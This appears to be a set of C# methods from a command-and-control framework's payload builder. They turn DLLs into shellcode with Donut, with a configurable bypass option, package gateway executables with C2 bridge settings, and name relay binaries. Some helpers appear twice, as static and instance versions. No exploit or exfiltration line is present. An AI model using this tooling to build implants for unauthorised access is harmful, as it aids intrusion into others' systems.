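/// <summary>
/// Runs a DLL payload through the Donut library and returns the bytes Donut produced.
/// </summary>
/// <param name="payload">Raw bytes of the DLL that is staged on disk for Donut.</param>
/// <param name="request">Supplies the format, compress, entropy and bypass values copied into the Donut configuration.</param>
/// <param name="arch">Target architecture; any value other than X64 is mapped to X86.</param>
/// <returns>The contents of the output file written by Donut.</returns>
public byte[] GenerateShellcode(byte[] payload, DonutRequest request, Build.Architecture arch)
{
    // The Donut API only works on files, so input and output are staged under m_TempPath.
    // Path.GetRandomFileName() yields a cryptographically strong name, so concurrent requests
    // cannot collide and the staging path cannot be guessed from a System.Random seed.
    var tmpFilename = Path.GetRandomFileName();
    var tmpPayloadFile = Path.Combine(m_TempPath, tmpFilename + ".dll");
    var tmpDonutFile = Path.Combine(m_TempPath, tmpFilename + ".donut");

    // Build the configuration before anything touches the disk: if reading the request
    // throws, no staged file is left behind.
    var config = new DonutLibrary.DonutConfig
    {
        arch = (int)(arch == Build.Architecture.X64 ? DonutLibrary.Architecture.X64 : DonutLibrary.Architecture.X86),
        mod_type = (int)(DonutLibrary.ModuleType.DLL),
        format = (int)request.format,
        compress = (int)request.compress,
        entropy = (int)request.entropy,
        inst_type = (int)DonutLibrary.InstanceType.PIC,
        input = tmpPayloadFile,
        output = tmpDonutFile,
        bypass = (int)request.bypass,
        inst_len = 0
    };

    try
    {
        // Written inside the try so a partial write is also removed by the finally block.
        WriteToFile(payload, tmpPayloadFile);
        DonutLibrary.GenerateShellcode(config);
        return File.ReadAllBytes(tmpDonutFile);
    }
    finally
    {
        // NOTE(review): the original already called CleanupFile on an output file that may
        // never have been created, so it is assumed to tolerate missing files; confirm.
        CleanupFile(tmpPayloadFile);
        CleanupFile(tmpDonutFile);
    }
}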
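/// <summary>
/// Builds a zip download containing the gateway executable for the requested architecture
/// and a GatewayConfiguration.json describing it.
/// </summary>
/// <param name="architecture">Architecture of the gateway binary to package.</param>
/// <param name="name">Optional caller-supplied gateway name; a generated agent id is used when it is null.</param>
/// <param name="customizer">Service that supplies the gateway binary bytes.</param>
/// <param name="gss">Service whose configuration provides the API bridge address and port.</param>
/// <returns>A file result with content type application/zip.</returns>
public IActionResult GetGatewayExeArchitecture(Build.Architecture architecture, string name, [FromServices] ICustomizer customizer, [FromServices] GatewaysSyncService gss)
{
    using (var ms = new MemoryStream())
    {
        // NOTE(review): the identifiers below come from System.Random; confirm nothing
        // relies on them being unguessable.
        var rand = new Random();
        var agentId = new HexId(rand.NextU64()).ToString();
        var nameOrAgentId = name ?? agentId;

        // 'name' arrives from the request and ends up in a zip entry name and in the download
        // file name. Path separators or control characters there would let a crafted name
        // place the entry outside the extraction directory ("zip slip") when the archive is
        // unpacked, so every character outside [letters, digits, '-', '_', '.'] is replaced.
        // The unmodified value is still written to the JSON "Name" field below.
        var fileNameChars = nameOrAgentId.ToCharArray();
        for (var i = 0; i < fileNameChars.Length; i++)
        {
            var ch = fileNameChars[i];
            if (!(char.IsLetterOrDigit(ch) || ch == '-' || ch == '_' || ch == '.'))
            {
                fileNameChars[i] = '_';
            }
        }
        var fileSafeName = new string(fileNameChars);

        using (var zipArchive = new ZipArchive(ms, ZipArchiveMode.Create))
        {
            var gatewayEntry = zipArchive.CreateEntry($"Gateway{architecture}_{fileSafeName}.exe");
            using (var bw = new BinaryWriter(gatewayEntry.Open()))
            {
                bw.Write(customizer.GetGateway(architecture));
            }

            var configEntry = zipArchive.CreateEntry("GatewayConfiguration.json");
            var config = new JObject()
            {
                ["BuildId"] = new HexId(rand.NextU16()).ToString(),
                ["AgentId"] = agentId,
                ["Name"] = nameOrAgentId,
                ["API Bridge IP"] = gss.conf.apiBridge.ipAddress.ToString(),
                ["API Bridge port"] = gss.conf.apiBridge.port,
            };
            using (var w = new StreamWriter(configEntry.Open()))
            {
                w.Write(config.ToString());
            }
        }

        // The archive is disposed before the buffer is read so the zip central directory
        // has been written to the stream.
        return File(ms.ToArray(), "application/zip", $"Gateway_{fileSafeName}.zip");
    }
}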
/// <summary>
/// Builds the short build-flavour tag used in binary file names: "d" or "r" followed by "64" or "86".
/// </summary>
/// <param name="arch">Architecture; X64 yields "64", any other value yields "86".</param>
/// <param name="debug">When true the tag starts with "d", otherwise with "r".</param>
/// <returns>The concatenated tag, e.g. "r64".</returns>
private static string GetBinaryDescription(Build.Architecture arch, bool debug = false)
{
    string flavour = "r";
    if (debug)
    {
        flavour = "d";
    }

    string bits = "86";
    if (arch == Build.Architecture.X64)
    {
        bits = "64";
    }

    return flavour + bits;
}
/// <summary>
/// Builds the short build-flavour tag used in binary file names from the instance's
/// binary-selection flags and the requested architecture.
/// </summary>
/// <param name="arch">Architecture; X64 yields "64", any other value yields "86".</param>
/// <returns>
/// "d", "rwdi" or "r" followed by the architecture suffix. UseDebugBinaries takes precedence
/// over UseRWDIBinaries.
/// </returns>
private string GetBinaryDescription(Build.Architecture arch)
{
    // Debug wins over RWDI; plain release is the fallback.
    string flavour = this.UseDebugBinaries
        ? "d"
        : (this.UseRWDIBinaries ? "rwdi" : "r");

    string bits = "86";
    if (arch == Build.Architecture.X64)
    {
        bits = "64";
    }

    return flavour + bits;
}
/// <summary>
/// Loads the gateway binary for the given architecture from the payload template directory.
/// </summary>
/// <param name="arch">Architecture used to pick the gateway file name.</param>
/// <returns>The full contents of the selected file.</returns>
public byte[] GetGateway(Build.Architecture arch)
{
    var gatewayFileName = GetGatewayFileName(arch);
    var gatewayPath = Path.Combine(PayloadTemplateDir, gatewayFileName);
    return File.ReadAllBytes(gatewayPath);
}
/// <summary>
/// Formats the gateway file-name template with the build-flavour tag for the given architecture.
/// </summary>
/// <param name="arch">Architecture passed to GetBinaryDescription.</param>
/// <returns>The gatewayFile format string with the tag substituted.</returns>
private string GetGatewayFileName(Build.Architecture arch)
{
    var template = gatewayFile;
    var description = GetBinaryDescription(arch);
    return string.Format(template, description);
}
/// <summary>
/// Formats the file-name template registered for a binary type with the build-flavour tag
/// for the given architecture.
/// </summary>
/// <param name="binaryType">Key used to look up the template in payloadTemplateFiles.</param>
/// <param name="arch">Architecture passed to GetBinaryDescription.</param>
/// <returns>The selected format string with the tag substituted.</returns>
private string GetRelayFileName(Build.BinaryType binaryType, Build.Architecture arch)
{
    var template = payloadTemplateFiles[binaryType];
    var description = GetBinaryDescription(arch);
    return string.Format(template, description);
}
/// <summary>
/// Creates a NewBuild from a relay build, copying its build id and architecture and taking
/// the command data from the first startup command.
/// </summary>
/// <param name="relayBuild">
/// Source build. StartupCommands[0] is read without a guard, so the collection is expected
/// to hold at least one entry.
/// </param>
public NewBuild(RelayBuild relayBuild)
{
    BuildId = relayBuild.BuildId;

    // Only the first startup command is used.
    var firstCommand = relayBuild.StartupCommands[0];
    var parsedCommand = firstCommand.ToObject<Command>();
    Command = parsedCommand.Data;

    Arch = relayBuild.Arch;
}
/// <summary>
/// Formats the gateway file-name template with the build-flavour tag for the given
/// architecture and debug setting.
/// </summary>
/// <param name="arch">Architecture passed to GetBinaryDescription.</param>
/// <param name="debug">Debug flag passed to GetBinaryDescription.</param>
/// <returns>The gatewayFile format string with the tag substituted.</returns>
private static string GetGatewayFileName(Build.Architecture arch, bool debug = false)
{
    var template = gatewayFile;
    var description = GetBinaryDescription(arch, debug);
    return string.Format(template, description);
}
/// <summary>
/// Formats the file-name template registered for a binary type with the build-flavour tag
/// for the given architecture and debug setting.
/// </summary>
/// <param name="binaryType">Key used to look up the template in payloadTemplateFiles.</param>
/// <param name="arch">Architecture passed to GetBinaryDescription.</param>
/// <param name="debug">Debug flag passed to GetBinaryDescription.</param>
/// <returns>The selected format string with the tag substituted.</returns>
private static string GetRelayFileName(Build.BinaryType binaryType, Build.Architecture arch, bool debug = false)
{
    var template = payloadTemplateFiles[binaryType];
    var description = GetBinaryDescription(arch, debug);
    return string.Format(template, description);
}